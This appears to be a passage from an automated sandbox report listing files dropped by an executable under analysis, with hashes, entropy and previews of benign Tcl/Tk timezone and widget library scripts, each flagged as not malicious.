                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                              Entropy (8bit):4.87340978435866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/iGIfh4903GKT:MByMY3GKDp3GKItiBfh4903GKT
                                                                                                                                                                                                                              MD5:00AAFD60A0B1146274981FAB6336AFD9
                                                                                                                                                                                                                              SHA1:20AD47ED52874202585C90FE362663F060E064D3
                                                                                                                                                                                                                              SHA-256:5827B6A6D50CF0FB75D6BA6E36282591AD25E1F0BE636DCFC5D09BDA29A107FD
                                                                                                                                                                                                                              SHA-512:61113AB72B7D671D7B429106709E73DB57D5B8A382680BA37A54126C7F54BC2D6B47A2584177CE6B434793546DA7EB9B8B7DF9163816DBFC67C83D9930D6A158
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.83459089067994
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06FQGFfXHAIg206FQJARL/iHaMCELMr4IAcGE6FQB:SlSWB9vsM3y74PFPHAIgp4KAN/iHaMHs
                                                                                                                                                                                                                              MD5:D955A5A943B203DC4B87A91ED196B82A
                                                                                                                                                                                                                              SHA1:C7ACC48AB2033C372C60C741F68B12FFAEA147DE
                                                                                                                                                                                                                              SHA-256:B4E4269C4FEBFEFF26750B297A590226C0A6872519A6BFDE36F6DC3F6F756349
                                                                                                                                                                                                                              SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.892777905787396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                                                                                                              MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                                                                                                              SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                                                                                                              SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                                                                                                              SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.932311644026309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                                                                                                              MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                                                                                                              SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                                                                                                              SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                                                                                                              SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.838968615416201
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                                                                                                              MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                                                                                                              SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                                                                                                              SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                                                                                                              SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                                                                                                              MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                                                                                                              SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                                                                                                              SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                                                                                                              SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.879221007428352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                                                                                                              MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                                                                                                              SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                                                                                                              SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                                                                                                              SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.999171213761279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                                                                                                              MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                                                                                                              SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                                                                                                              SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                                                                                                              SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6945
                                                                                                                                                                                                                              Entropy (8bit):3.7806395604065135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                                                                                                              SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                                                                                                              SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                                                                                                              SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                              Entropy (8bit):4.8800842076244715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                                                                                                              MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                                                                                                              SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                                                                                                              SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                                                                                                              SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5030
                                                                                                                                                                                                                              Entropy (8bit):4.838527643033185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                                                                                                              MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                                                                                                              SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                                                                                                              SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                                                                                                              SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8806
                                                                                                                                                                                                                              Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                              MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                              SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                              SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                              SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21612
                                                                                                                                                                                                                              Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                              MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                              SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                              SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                              SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# button.tcl --..#..# This file defines the default bindings for Tk label, button,..# checkbutton, and radiobutton widgets and provides procedures..# that help in implementing those bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 2002 ActiveState Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for buttons...#-------------------------------------------------------------------------....if {[tk windowingsystem] eq "aqua"} {.... bind Radiobutton <Enter> {...tk::ButtonEnter %W.. }.. bind Radiobutton <1> {...tk::ButtonDown %W.. }.. bind Radiobutton <ButtonRelease-1> {...tk::ButtonUp %W.. }.. bind Checkbutton <Enter> {...tk::ButtonEnter %W
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9960
                                                                                                                                                                                                                              Entropy (8bit):4.802555950168837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:HKOdkMpU9YUp8UIhMYYicln9Die0luVZat3pIp5Y3sF1P8Bg8p6trIOzvKsOiCLU:HyMm9J8wPx70luex4C8Fygq6tohef+0J
                                                                                                                                                                                                                              MD5:818E4F0112931F12B4FAC4CAD262814C
                                                                                                                                                                                                                              SHA1:AC7060DF952F9DB52C3687B8F5E6AA4ADF06992E
                                                                                                                                                                                                                              SHA-256:35B208E8570B0D1E0CA1C911D4FE02EE3B0CFE5667CF1BDEC006CF9D043122BA
                                                                                                                                                                                                                              SHA-512:0C535B6621BC83412B7A64CB6AC2BA526B8E49BB5F6BC5EBEDA41D223D68DEB031DB9C8A31F8671BC5F327D720942E7FDAE3328334B0B550AC991191F96909D6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# choosedir.tcl --..#..#.Choose directory dialog implementation for Unix/Mac...#..# Copyright (c) 1998-2000 by Scriptics Corporation...# All rights reserved.....# Make sure the tk::dialog namespace, in which all dialogs should live, exists..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {}....# Make the chooseDir namespace inside the dialog namespace..namespace eval ::tk::dialog::file::chooseDir {.. namespace import -force ::tk::msgcat::*..}....# ::tk::dialog::file::chooseDir:: --..#..#.Implements the TK directory selection dialog...#..# Arguments:..#.args..Options parsed by the procedure...#..proc ::tk::dialog::file::chooseDir:: {args} {.. variable ::tk::Priv.. set dataName __tk_choosedir.. upvar ::tk::dialog::file::$dataName data.. Config $dataName $args.... if {$data(-parent) eq "."} {.. set w .$dataName.. } else {.. set w $data(-parent).$dataName.. }.... # (re)create the dialog box if necessary.. #.. if {![winfo exis
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22103
                                                                                                                                                                                                                              Entropy (8bit):5.03166227244502
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:lJGidpe3JQDUd6hgp6EQstzQf+a9DPbS43/H//cO802UeeVnZmM6BA0kyVJv9Qpu:Gep6JCwQDPbLPaRCzTdMAe
                                                                                                                                                                                                                              MD5:AD86E0265C307348A16E9E4B64D8F235
                                                                                                                                                                                                                              SHA1:66EC6726DF997EE6096F642EBBBDB8C3201BA571
                                                                                                                                                                                                                              SHA-256:D210DCFA9ADB4C23E44EBF744839158CAB4E21EACF9483C6BA91BA6EC4660EB8
                                                                                                                                                                                                                              SHA-512:A0C9DF815FE54C26EED69C84B29FD829EB1B7E43D2787E98C71D091607226532F6F0E9213E83FF8263FCB6DA892178029D5EF475FD46D22F9BB8AB31B87BF438
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# clrpick.tcl --..#..#.Color selection dialog for platforms that do not support a..#.standard color selection dialog...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# ToDo:..#..#.(1): Find out how many free colors are left in the colormap and..#. don't allocate too many colors...#.(2): Implement HSV color selection...#....# Make sure namespaces exist..namespace eval ::tk {}..namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::color {.. namespace import ::tk::msgcat::*..}....# ::tk::dialog::color:: --..#..#.Create a color dialog and let the user choose a color. This function..#.should not be called directly. It is called by the tk_chooseColor..#.function when a native color selector widget does not exist..#..proc ::tk::dialog::color:: {args} {.. variable ::tk::Priv.. set dataName __tk__color.. upvar ::tk::dialog::color::$da
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8690
                                                                                                                                                                                                                              Entropy (8bit):5.098389551322902
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:u4R7+/gFw/MEN55fO7eyjt4bjC+gR8e3vwLln/+LVtUw0tXK4jA:u4l+/gFeMI55Xyjt4bjC+gOe3Ih/+LV1
                                                                                                                                                                                                                              MD5:ABF277E4F62423F4345B6AD65640B8C2
                                                                                                                                                                                                                              SHA1:E66A4E37D51C7827C9ACA449A42E0966AACBC8C8
                                                                                                                                                                                                                              SHA-256:C7DA292CCF5F413E599C3491C331FFD58CF273F8477FACB097E6F36CF1F32A08
                                                                                                                                                                                                                              SHA-512:AA9F75D7C5C915B5FCD2F454856D080D186AB9BA149DC139FEAF7F4AC3DC51E6769E138E3B1BE45B3FEC3AE744189DE44DB2B748F0628FF13E4E733B9CD68BD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# comdlg.tcl --..#..#.Some functions needed for the common dialog boxes. Probably need to go..#.in a different file...#..# Copyright (c) 1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# tclParseConfigSpec --..#..#.Parses a list of "-option value" pairs. If all options and..#.values are legal, the values are stored in..#.$data($option). Otherwise an error message is returned. When..#.an error happens, the data() array may have been partially..#.modified, but all the modified members of the data(0 array are..#.guaranteed to have valid values. This is different than..#.Tk_ConfigureWidget() which does not modify the value of a..#.widget record if any error occurs...#..# Arguments:..#..# w = widget record to modify. Must be the pathname of a widget...#..# specs = {..# {-commandlineswitch resourceName ResourceClass defaultValue verifier}..# {....}..# }..#..# flags
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33347
                                                                                                                                                                                                                              Entropy (8bit):4.995865221021151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:jMpwGU6OGEJemVueuR3fitsHI76Su6qKQjGCy1HyOnmTTRV+po2mBh6S5mDjbHqC:jMpdUDGEJpC6+oVeKQPjnD2jVfV/
                                                                                                                                                                                                                              MD5:4CA2E90A125FFD6191D0C5AC6818D18F
                                                                                                                                                                                                                              SHA1:855F10234FA1D65521C2508206EA58DC565E452B
                                                                                                                                                                                                                              SHA-256:A4B21DBF699C20EA5AC334EC109F731BE8EB2B8F9A34CCC2EBE538F4BF8A05F8
                                                                                                                                                                                                                              SHA-512:ED5AE05A7F1D379F8343FF4AD7EF561C5C4D9B7E02399A7281DF8B8930B924B0482FDC5B4E3F90C2214ADA4F87D9A5E64DB2259194C58A2135D969C01BBE64F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# console.tcl --..#..# This code constructs the console window for an application. It..# can be used by non-unix systems that do not have built-in support..# for shells...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 2007-2008 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# TODO: history - remember partially written command....namespace eval ::tk::console {.. variable blinkTime 500 ; # msecs to blink braced range for.. variable blinkRange 1 ; # enable blinking of the entire braced range.. variable magicKeys 1 ; # enable brace matching and proc/var recognition.. variable maxLines 600 ; # maximum # of lines buffered in console.. variable showMatches 1 ; # show multiple expand matches.. variable useFontchooser [llength [info command ::tk::fontchooser]
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5988
                                                                                                                                                                                                                              Entropy (8bit):4.829498876074983
                                                                                                                                                                                                                              Encrypted:false
